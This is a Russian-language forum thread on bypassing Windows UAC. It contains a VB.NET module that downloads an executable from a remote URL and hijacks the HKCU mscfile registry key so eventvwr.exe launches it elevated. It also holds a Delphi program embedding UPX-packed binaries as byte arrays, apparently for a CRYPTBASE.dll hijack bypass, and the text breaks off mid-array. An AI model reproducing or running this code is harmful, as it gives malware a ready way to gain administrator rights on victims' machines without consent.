• Уменьшение отступа

    Обратная связь

    (info@ru-sfera.pw)

Вопрос Обход UAC (Bypass UAC)


U

UAC

Гость
что мешает переписать на С++ ? подозреваю что руки
нет руки не мешают. решения, которые тут приставлены работают! НО ТОЛЬКО ПОСЛЕ перезагрузки. это не куда не идет. есть другие решения по вашему мнению?
 

Indy

Уважаемый пользователь
Форумчанин
Регистрация
21.01.2015
Сообщения
277
Репутация
105
Автор не EP_X0FF, а другой даже не человек, а приват сообщество. Это полу-авер, рипающий на свой ресурс кодес(kernelmode.info).
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Код (vb.net)
Код:
Module Module1
    Dim URLtoFile As String = "https://the.earth.li/~sgtatham/putty/latest/x86/putty.exe" 'URL to PayLoad
    Dim FilePath As String = IO.Path.GetTempPath
    'How this works
    'When eventvwr.exe is ran it starts a process call mmc.exe using the key HKLM\Software\Classes\mscfile\shell\open\command as admin
    'eventvwr.exe also will lounch the key in HLCU so you just make a key and lounch
    Sub Main()
        Dim Client As New Net.WebClient
        Client.DownloadFile(URLtoFile, FilePath + "payload.exe") 'Downlaod and Save the Payload
        Microsoft.Win32.Registry.CurrentUser.CreateSubKey("Software\Classes\mscfile\shell\open\command").SetValue("", FilePath + "payload.exe") 'Create a registry entry to the payload
        Process.Start("eventvwr.exe") 'Start Event Viewer
        'This makes Windows lounch the payload with admin rights, as a background application
'You should also delete the key made so even viewer works normal again.
    End Sub
End Module
 

Hunchback

Пользователь
Форумчанин
Регистрация
23.10.2016
Сообщения
13
Репутация
1
Привет всем, что то тыкал тыкал не адельфи, не инжектится, запускал код

Код:
program Project2;

{$APPTYPE GUI}

{$R *.res}

uses
  windows,
  ShellAPI,
  SysUtils;

  //Winapi.Windows;

  //System.SysUtils;

  //Winapi.Shellapi;

const
  FOp: array[0..2559] of byte = ($4D, $5A, $80, $00, $01, $00, $00, $00, $04, $00, $10, $00, $FF, $FF, $00, $00, $40, $01, $00, $00, $00, $00, $00, $00, $40, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $80, $00, $00, $00, $0E, $1F, $BA, $0E, $00, $B4, $09, $CD, $21, $B8, $01, $4C, $CD, $21, $54, $68, $69, $73, $20, $70, $72, $6F, $67, $72, $61, $6D, $20, $63, $61, $6E, $6E, $6F,
    $74, $20, $62, $65, $20, $72, $75, $6E, $20, $69, $6E, $20, $44, $4F, $53, $20, $6D, $6F, $64, $65, $2E, $0D, $0A, $24, $00, $00, $00, $00, $00, $00, $00, $00, $50, $45, $00, $00, $4C, $01, $03, $00, $C5, $76, $35, $53, $00, $00, $00, $00, $00, $00, $00, $00, $E0, $00, $0F, $01, $0B, $01, $01, $46, $00, $10, $00, $00, $00, $10, $00, $00, $00, $40, $00, $00, $90, $52, $00, $00, $00, $50, $00, $00, $00, $60, $00, $00, $00, $00, $40, $00, $00, $10, $00, $00, $00, $02, $00, $00, $01, $00, $00, $00, $00, $00,
    $00, $00, $04, $00, $00, $00, $00, $00, $00, $00, $00, $70, $00, $00, $00, $10, $00, $00, $00, $00, $00, $00, $02, $00, $00, $00, $00, $10, $00, $00, $00, $10, $00, $00, $00, $00, $01, $00, $00, $00, $00, $00, $00, $00, $00, $00, $10, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $60, $00, $00, $24, $01, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
    $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $55, $50, $58, $30, $00, $00, $00, $00, $00, $40, $00, $00, $00, $10, $00, $00, $00, $00, $00, $00, $00, $02, $00, $00, $00, $00,
    $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $80, $00, $00, $E0, $55, $50, $58, $31, $00, $00, $00, $00, $00, $10, $00, $00, $00, $50, $00, $00, $00, $06, $00, $00, $00, $02, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $40, $00, $00, $E0, $55, $50, $58, $32, $00, $00, $00, $00, $00, $10, $00, $00, $00, $60, $00, $00, $00, $02, $00, $00, $00, $08, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $40, $00, $00, $C0, $33, $2E, $30, $37, $00, $55, $50, $58,
    $21, $0D, $09, $02, $09, $3D, $B4, $BA, $E9, $75, $E7, $7C, $38, $0D, $32, $00, $00, $78, $02, $00, $00, $00, $0C, $00, $00, $16, $00, $00, $B9, $9B, $66, $2B, $FF, $C7, $05, $00, $20, $40, $00, $24, $00, $09, $14, $04, $6A, $00, $76, $BB, $77, $FF, $FF, $15, $E8, $68, $00, $40, $49, $22, $10, $68, $04, $01, $00, $0F, $8C, $30, $0A, $4E, $24, $DC, $66, $B7, $E7, $04, $14, $0F, $90, $30, $1A, $0F, $2A, $22, $77, $92, $CF, $F7, $94, $1F, $3A, $2A, $22, $20, $25, $04, $F3, $7C, $BF, $48, $00, $49, $6A, $24,
    $29, $EC, $32, $90, $EE, $61, $DD, $10, $19, $6A, $50, $1C, $31, $16, $36, $FD, $B6, $93, $1C, $2A, $22, $14, $04, $69, $A1, $4C, $50, $8B, $EC, $B5, $F7, $BD, $12, $50, $14, $6A, $A1, $35, $2B, $05, $48, $1A, $BE, $4B, $2E, $BB, $40, $0A, $54, $08, $D0, $88, $44, $10, $05, $E6, $76, $00, $DF, $75, $DF, $FD, $5C, $00, $73, $00, $79, $03, $70, $00, $72, $00, $65, $05, $5C, $1B, $43, $00, $52, $00, $59, $36, $F3, $FF, $FF, $00, $50, $00, $54, $00, $42, $00, $41, $00, $53, $00, $45, $00, $2E, $00, $64, $00,
    $6C, $00, $6C, $0B, $6C, $B7, $B9, $FF, $EF, $27, $76, $00, $61, $00, $74, $00, $69, $00, $6F, $00, $6E, $00, $3A, $23, $1D, $6D, $0D, $75, $9F, $E9, $36, $0B, $69, $49, $74, $1D, $6F, $07, $21, $BD, $B9, $BB, $CD, $13, $2D, $77, $23, $7B, $00, $33, $15, $27, $30, $00, $35, $B2, $3D, $77, $D7, $01, $37, $03, $2D, $00, $38, $01, $0B, $09, $34, $D7, $8D, $7C, $37, $30, $13, $39, $00, $32, $00, $37, $31, $01, $62, $17, $77, $5D, $F7, $BA, $05, $64, $09, $49, $30, $1F, $7D, $85, $75, $55, $D0, $FF, $FF, $FF,
    $FF, $3A, $57, $88, $50, $48, $92, $77, $11, $B8, $5B, $DB, $8E, $09, $5F, $AB, $7A, $94, $5C, $0A, $13, $4C, $B4, $D6, $4B, $F7, $83, $6F, $C9, $F8, $1E, $6D, $82, $22, $AC, $F8, $FF, $43, $18, $E7, $EE, $42, $BC, $55, $A1, $E2, $61, $C3, $7B, $FE, $32, $72, $65, $07, $A2, $50, $30, $13, $5E, $2B, $B2, $C9, $00, $68, $03, $72, $B6, $69, $96, $30, $AA, $BA, $C6, $30, $13, $9C, $DB, $AD, $CA, $56, $00, $47, $04, $31, $0B, $3B, $95, $2D, $39, $F4, $00, $24, $31, $07, $8A, $2A, $A4, $CE, $FD, $47, $51, $01,
    $B6, $0C, $7C, $2F, $FF, $5F, $36, $88, $20, $01, $45, $78, $69, $74, $50, $72, $6F, $63, $65, $73, $73, $47, $65, $74, $B1, $ED, $B7, $FF, $54, $65, $6D, $70, $50, $61, $74, $68, $57, $0D, $6C, $73, $74, $72, $63, $0A, $57, $17, $B3, $FD, $DF, $DA, $53, $79, $0D, $1A, $44, $69, $72, $65, $63, $74, $6F, $72, $79, $57, $42, $89, $EE, $FD, $ED, $4F, $E8, $43, $6F, $49, $6E, $44, $69, $61, $6C, $69, $7A, $65, $0D, $2D, $BB, $D9, $6C, $EE, $4F, $62, $6A, $27, $23, $93, $1C, $21, $53, $48, $43, $39, $7F, $DB,
    $BA, $5B, $4B, $65, $49, $44, $46, $6E, $6D, $62, $72, $73, $69, $6E, $67, $4E, $F9, $2F, $4F, $E8, $61, $6D, $65, $8C, $50, $45, $4C, $01, $03, $00, $C5, $76, $35, $53, $83, $34, $FF, $0F, $E0, $00, $0F, $01, $0B, $01, $01, $46, $00, $02, $08, $10, $EC, $66, $DF, $60, $03, $20, $0C, $40, $0B, $1F, $01, $00, $BD, $67, $87, $9D, $04, $3C, $40, $17, $19, $82, $06, $2C, $78, $CB, $96, $37, $29, $0E, $34, $0C, $45, $F6, $26, $42, $1A, $00, $2E, $F6, $0D, $E9, $2E, $10, $78, $74, $90, $ED, $AC, $02, $23, $0B,
    $16, $EE, $16, $EA, $60, $2E, $64, $3D, $61, $9C, $64, $03, $1B, $AC, $05, $FB, $06, $EC, $F2, $1B, $6C, $6C, $F6, $C0, $2E, $69, $28, $CB, $30, $4B, $0A, $27, $EE, $84, $68, $29, $02, $6C, $91, $07, $00, $00, $00, $00, $00, $80, $04, $00, $FF, $00, $00, $00, $60, $BE, $15, $50, $40, $00, $8D, $BE, $EB, $BF, $FF, $FF, $57, $83, $CD, $FF, $EB, $10, $90, $90, $90, $90, $90, $90, $8A, $06, $46, $88, $07, $47, $01, $DB, $75, $07, $8B, $1E, $83, $EE, $FC, $11, $DB, $72, $ED, $B8, $01, $00, $00, $00, $01, $DB,
    $75, $07, $8B, $1E, $83, $EE, $FC, $11, $DB, $11, $C0, $01, $DB, $73, $EF, $75, $09, $8B, $1E, $83, $EE, $FC, $11, $DB, $73, $E4, $31, $C9, $83, $E8, $03, $72, $0D, $C1, $E0, $08, $8A, $06, $46, $83, $F0, $FF, $74, $74, $89, $C5, $01, $DB, $75, $07, $8B, $1E, $83, $EE, $FC, $11, $DB, $11, $C9, $01, $DB, $75, $07, $8B, $1E, $83, $EE, $FC, $11, $DB, $11, $C9, $75, $20, $41, $01, $DB, $75, $07, $8B, $1E, $83, $EE, $FC, $11, $DB, $11, $C9, $01, $DB, $73, $EF, $75, $09, $8B, $1E, $83, $EE, $FC, $11, $DB, $73,
    $E4, $83, $C1, $02, $81, $FD, $00, $F3, $FF, $FF, $83, $D1, $01, $8D, $14, $2F, $83, $FD, $FC, $76, $0F, $8A, $02, $42, $88, $07, $47, $49, $75, $F7, $E9, $63, $FF, $FF, $FF, $90, $8B, $02, $83, $C2, $04, $89, $07, $83, $C7, $04, $83, $E9, $04, $77, $F1, $01, $CF, $E9, $4C, $FF, $FF, $FF, $5E, $89, $F7, $B9, $01, $00, $00, $00, $8A, $07, $47, $2C, $E8, $3C, $01, $77, $F7, $8B, $07, $8A, $5F, $04, $86, $C4, $C1, $C0, $10, $86, $C4, $29, $F8, $80, $EB, $E8, $01, $F0, $89, $07, $83, $C7, $05, $88, $D8, $E2,
    $E0, $8D, $BE, $00, $30, $00, $00, $8B, $07, $09, $C0, $74, $3C, $8B, $5F, $04, $8D, $84, $30, $00, $50, $00, $00, $01, $F3, $50, $83, $C7, $08, $FF, $96, $50, $50, $00, $00, $95, $8A, $07, $47, $08, $C0, $74, $DC, $89, $F9, $57, $48, $F2, $AE, $55, $FF, $96, $54, $50, $00, $00, $09, $C0, $74, $07, $89, $03, $83, $C3, $04, $EB, $E1, $FF, $96, $64, $50, $00, $00, $8B, $AE, $58, $50, $00, $00, $8D, $BE, $00, $F0, $FF, $FF, $BB, $00, $10, $00, $00, $50, $54, $6A, $04, $53, $57, $FF, $D5, $8D, $87, $9F, $01,
    $00, $00, $80, $20, $7F, $80, $60, $28, $7F, $58, $50, $54, $50, $53, $57, $FF, $D5, $58, $61, $8D, $44, $24, $80, $6A, $00, $39, $C4, $75, $FA, $83, $EC, $80, $E9, $E7, $BB, $FF, $FF, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
    $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
    $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
    $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
    $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
    $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $7C, $60, $00, $00, $50, $60, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $89, $60, $00, $00, $6C, $60, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $93, $60, $00, $00, $74, $60, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $9E, $60, $00, $00, $AC, $60, $00, $00,
    $BC, $60, $00, $00, $CC, $60, $00, $00, $DA, $60, $00, $00, $E8, $60, $00, $00, $00, $00, $00, $00, $F6, $60, $00, $00, $00, $00, $00, $00, $04, $61, $00, $00, $00, $00, $00, $00, $4B, $45, $52, $4E, $45, $4C, $33, $32, $2E, $44, $4C, $4C, $00, $4F, $4C, $45, $33, $32, $2E, $44, $4C, $4C, $00, $53, $48, $45, $4C, $4C, $33, $32, $2E, $44, $4C, $4C, $00, $00, $4C, $6F, $61, $64, $4C, $69, $62, $72, $61, $72, $79, $41, $00, $00, $47, $65, $74, $50, $72, $6F, $63, $41, $64, $64, $72, $65, $73, $73, $00, $00,
    $56, $69, $72, $74, $75, $61, $6C, $50, $72, $6F, $74, $65, $63, $74, $00, $00, $56, $69, $72, $74, $75, $61, $6C, $41, $6C, $6C, $6F, $63, $00, $00, $56, $69, $72, $74, $75, $61, $6C, $46, $72, $65, $65, $00, $00, $00, $45, $78, $69, $74, $50, $72, $6F, $63, $65, $73, $73, $00, $00, $00, $43, $6F, $47, $65, $74, $4F, $62, $6A, $65, $63, $74, $00, $00, $00, $53, $48, $43, $72, $65, $61, $74, $65, $49, $74, $65, $6D, $46, $72, $6F, $6D, $50, $61, $72, $73, $69, $6E, $67, $4E, $61, $6D, $65, $00, $00, $00,
    $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
    $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00);

  DllDummy: array[0..3583] of byte = ($4D, $5A, $90, $00, $03, $00, $00, $00, $04, $00, $00, $00, $FF, $FF, $00, $00, $B8, $00, $00, $00, $00, $00, $00, $00, $40, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $80, $00, $00, $00, $0E, $1F, $BA, $0E, $00, $B4, $09, $CD, $21, $B8, $01, $4C, $CD, $21, $54, $68, $69, $73, $20, $70, $72, $6F, $67, $72, $61, $6D, $20, $63, $61, $6E, $6E,
    $6F, $74, $20, $62, $65, $20, $72, $75, $6E, $20, $69, $6E, $20, $44, $4F, $53, $20, $6D, $6F, $64, $65, $2E, $0D, $0D, $0A, $24, $00, $00, $00, $00, $00, $00, $00, $50, $45, $00, $00, $4C, $01, $03, $00, $FA, $BF, $34, $53, $00, $00, $00, $00, $00, $00, $00, $00, $E0, $00, $0E, $21, $0B, $01, $02, $32, $00, $10, $00, $00, $00, $10, $00, $00, $00, $70, $00, $00, $60, $88, $00, $00, $00, $80, $00, $00, $00, $90, $00, $00, $00, $00, $00, $10, $00, $10, $00, $00, $00, $02, $00, $00, $04, $00, $00, $00, $00,
    $00, $00, $00, $04, $00, $00, $00, $00, $00, $00, $00, $00, $A0, $00, $00, $00, $10, $00, $00, $00, $00, $00, $00, $03, $00, $00, $00, $00, $00, $10, $00, $00, $10, $00, $00, $00, $00, $10, $00, $00, $10, $00, $00, $00, $00, $00, $00, $10, $00, $00, $00, $00, $91, $00, $00, $48, $00, $00, $00, $00, $90, $00, $00, $00, $01, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $48, $91, $00, $00, $0C, $00, $00, $00, $00, $00, $00,
    $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $55, $50, $58, $30, $00, $00, $00, $00, $00, $70, $00, $00, $00, $10, $00, $00, $00, $00, $00, $00, $00, $02, $00, $00, $00,
    $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $80, $00, $00, $E0, $55, $50, $58, $31, $00, $00, $00, $00, $00, $10, $00, $00, $00, $80, $00, $00, $00, $0A, $00, $00, $00, $02, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $40, $00, $00, $E0, $55, $50, $58, $32, $00, $00, $00, $00, $00, $10, $00, $00, $00, $90, $00, $00, $00, $02, $00, $00, $00, $0C, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $40, $00, $00, $C0, $33, $2E, $30, $37, $00, $55, $50,
    $58, $21, $0D, $09, $02, $0A, $53, $F5, $AB, $08, $7F, $8C, $C0, $1C, $D1, $63, $00, $00, $41, $08, $00, $00, $00, $1A, $00, $00, $00, $00, $00, $B4, $7E, $DB, $FF, $FF, $83, $7C, $24, $08, $01, $75, $0E, $8B, $44, $24, $04, $A3, $00, $00, $32, $D8, $E8, $22, $05, $00, $14, $02, $75, $77, $19, $EC, $C7, $06, $00, $75, $05, $E8, $38, $12, $03, $B8, $01, $0B, $E5, $B3, $9D, $7B, $C2, $0C, $00, $68, $06, $04, $10, $00, $09, $E8, $BB, $0F, $DD, $6D, $BA, $7F, $3F, $D4, $E8, $EB, $16, $0E, $F1, $E8, $18, $18,
    $C3, $E8, $11, $7B, $37, $76, $F9, $1E, $26, $17, $FF, $35, $1F, $97, $1A, $C3, $C3, $8B, $15, $0C, $9F, $3B, $1B, $BB, $E8, $52, $52, $14, $E8, $43, $AC, $4D, $17, $30, $EF, $2E, $DB, $FD, $00, $01, $14, $24, $E8, $47, $09, $8F, $05, $1D, $65, $37, $31, $C0, $C3, $00, $38, $14, $44, $65, $00, $FF, $25, $91, $91, $B1, $25, $70, $C0, $05, $D8, $DC, $E0, $27, $F8, $91, $E0, $E4, $FF, $74, $24, $04, $A2, $EC, $E8, $CE, $03, $D2, $FD, $97, $8B, $85, $C0, $74, $17, $FF, $30, $FF, $15, $1A, $E8, $D8, $7F, $C1,
    $BF, $37, $C2, $04, $00, $6A, $01, $10, $E8, $55, $06, $14, $10, $1E, $6A, $DF, $B1, $7F, $C1, $04, $6A, $53, $F0, $E8, $F2, $05, $12, $32, $F4, $0E, $EC, $AE, $7B, $FF, $63, $3F, $EC, $C3, $55, $8B, $EC, $51, $53, $56, $57, $43, $22, $18, $35, $FF, $FF, $63, $FF, $83, $4D, $FC, $FF, $8B, $F8, $33, $F6, $20, $F0, $8A, $08, $84, $C9, $74, $75, $8B, $55, $08, $80, $F9, $20, $75, $06, $40, $80, $77, $FB, $F6, $F6, $38, $20, $74, $FA, $13, $33, $DB, $43, $0F, $22, $75, $23, $40, $0A, $8B, $F0, $20, $FD, $B7,
    $DF, $5D, $16, $0D, $74, $07, $40, $2C, $75, $F4, $23, $00, $74, $05, $8B, $D0, $40, $EB, $21, $03, $73, $AD, $BB, $04, $EB, $1D, $1D, $17, $23, $3D, $1F, $F6, $B7, $B7, $6F, $18, $74, $04, $EB, $DE, $45, $8B, $0F, $3B, $6D, $75, $07, $8B, $4D, $08, $85, $18, $0B, $EE, $BA, $FF, $1A, $85, $DB, $74, $03, $FF, $45, $FC, $5E, $F6, $27, $8E, $83, $7D, $F7, $F7, $F6, $FF, $76, $13, $8B, $10, $EB, $14, $85, $F6, $74, $0D, $2B, $D6, $89, $11, $FF, $2A, $C6, $EB, $06, $2E, $FE, $D9, $73, $7F, $83, $21, $00, $5F,
    $5E, $5B, $C9, $EF, $C0, $BD, $83, $65, $FC, $00, $E8, $56, $70, $EB, $3E, $E6, $E4, $4E, $78, $02, $89, $08, $D8, $8D, $3E, $50, $E8, $DF, $DC, $FF, $AE, $2E, $00, $75, $0C, $8B, $75, $FC, $56, $8B, $D8, $E8, $4F, $E4, $07, $F8, $53, $57, $E8, $5A, $E4, $EC, $BF, $B7, $EE, $C4, $0C, $C6, $04, $37, $4D, $08, $1B, $B7, $FD, $0E, $EF, $4E, $30, $F4, $6A, $02, $4A, $3F, $FF, $D6, $02, $37, $04, $6E, $72, $C3, $87, $11, $F8, $5E, $7F, $0D, $FF, $37, $9D, $E6, $CA, $7F, $E1, $89, $07, $C9, $45, $8D, $6C, $24,
    $9C, $81, $EC, $C4, $00, $73, $D7, $76, $F7, $DF, $FE, $6A, $44, $5E, $56, $33, $FF, $3B, $DC, $53, $47, $50, $C7, $45, $60, $20, $17, $89, $5D, $58, $02, $CB, $B2, $2C, $CB, $50, $44, $5C, $48, $54, $40, $ED, $1F, $B9, $2D, $4C, $1E, $30, $0C, $34, $89, $7D, $38, $E8, $F3, $FD, $A8, $74, $FF, $ED, $EE, $8A, $4D, $78, $94, $89, $75, $DC, $10, $08, $F6, $C1, $02, $74, $0B, $33, $C0, $43, $28, $6F, $8D, $F8, $DF, $EB, $02, $8B, $C7, $66, $89, $45, $0C, $BE, $00, $00, $1A, $40, $74, $1D, $6F, $DD, $0B, $6F,
    $7F, $7C, $3B, $C3, $7E, $8B, $40, $0C, $06, $0F, $4B, $08, $01, $01, $DF, $DE, $5E, $36, $45, $14, $4C, $EB, $39, $21, $04, $74, $38, $04, $10, $74, $33, $53, $EE, $AC, $D9, $6E, $8A, $30, $50, $03, $50, $58, $C6, $FC, $C5, $CD, $B0, $FB, $B7, $1C, $3D, $58, $09, $75, $08, $8D, $7D, $50, $31, $E8, $01, $23, $40, $5B, $BB, $E0, $88, $4C, $5A, $49, $60, $F7, $1B, $85, $E0, $CD, $64, $DB, $B7, $04, $18, $3C, $74, $72, $F6, $0A, $08, $43, $5C, $44, $F9, $32, $32, $21, $5C, $44, $18, $E8, $BD, $FE, $93, $74,
    $C1, $5E, $3C, $47, $38, $20, $54, $CB, $C8, $84, $34, $48, $54, $48, $1C, $7F, $B8, $5D, $C8, $E8, $84, $85, $18, $74, $2A, $86, $31, $00, $39, $5D, $B3, $B9, $8D, $8D, $14, $20, $6A, $8D, $D6, $A3, $0B, $18, $B7, $D3, $2C, $4F, $F5, $18, $1C, $F4, $4A, $7D, $6C, $B2, $B9, $DB, $F6, $3B, $FB, $75, $0A, $3C, $6C, $31, $20, $06, $0D, $1C, $70, $8D, $B8, $70, $B6, $0E, $70, $E6, $D6, $04, $F7, $14, $FF, $EE, $C6, $75, $70, $85, $E8, $CC, $09, $59, $59, $8D, $44, $06, $04, $50, $53, $76, $DF, $FE, $8B, $09,
    $8F, $31, $04, $80, $3F, $22, $46, $7C, $74, $23, $BE, $30, $04, $56, $A7, $7B, $EB, $36, $30, $AA, $27, $57, $32, $7C, $E8, $A7, $08, $56, $6D, $6C, $FB, $C7, $9E, $04, $2A, $18, $EB, $09, $57, $1D, $8C, $45, $8B, $51, $21, $5F, $C1, $F4, $38, $1E, $74, $19, $51, $DE, $2A, $7C, $B6, $0D, $DB, $C8, $73, $10, $DF, $74, $93, $07, $38, $B2, $03, $DB, $A5, $D9, $16, $DC, $74, $FF, $20, $DC, $75, $74, $79, $75, $2F, $1F, $76, $B7, $60, $02, $4C, $53, $07, $7C, $53, $0F, $31, $08, $0F, $84, $8E, $B6, $D2, $F2,
    $73, $F7, $F2, $30, $E8, $5C, $40, $1C, $5C, $F2, $3C, $CF, $D6, $DB, $09, $58, $58, $54, $54, $B1, $D1, $50, $B6, $04, $24, $59, $01, $18, $6A, $D3, $85, $36, $D6, $D5, $20, $41, $0C, $1F, $A8, $45, $BF, $DD, $FB, $FE, $F4, $D8, $57, $10, $10, $6A, $28, $EB, $E0, $E8, $74, $02, $AC, $57, $FC, $ED, $DB, $DB, $58, $16, $14, $95, $20, $89, $06, $04, $28, $89, $46, $04, $05, $97, $65, $59, $96, $44, $0C, $50, $08, $48, $10, $E9, $90, $ED, $7D, $86, $2A, $7C, $52, $D6, $09, $8D, $3D, $79, $9E, $67, $9B, $D7,
    $09, $44, $44, $50, $50, $A7, $4B, $32, $D8, $A1, $D7, $09, $48, $AD, $E6, $DE, $95, $48, $A6, $78, $0F, $85, $E5, $D9, $13, $45, $50, $DE, $FA, $85, $3B, $32, $6C, $56, $E8, $48, $03, $63, $8D, $74, $30, $EC, $6E, $DD, $BF, $AD, $59, $3B, $F0, $76, $26, $80, $3E, $5F, $4E, $09, $77, $F6, $0D, $18, $50, $6F, $8E, $D6, $3D, $41, $2B, $22, $2B, $2B, $DC, $B9, $88, $5C, $06, $6E, $97, $FF, $85, $01, $9B, $74, $6A, $3C, $5E, $56, $8D, $45, $A0, $53, $D0, $FA, $F5, $0F, $B7, $B9, $CD, $B0, $95, $04, $14, $BC,
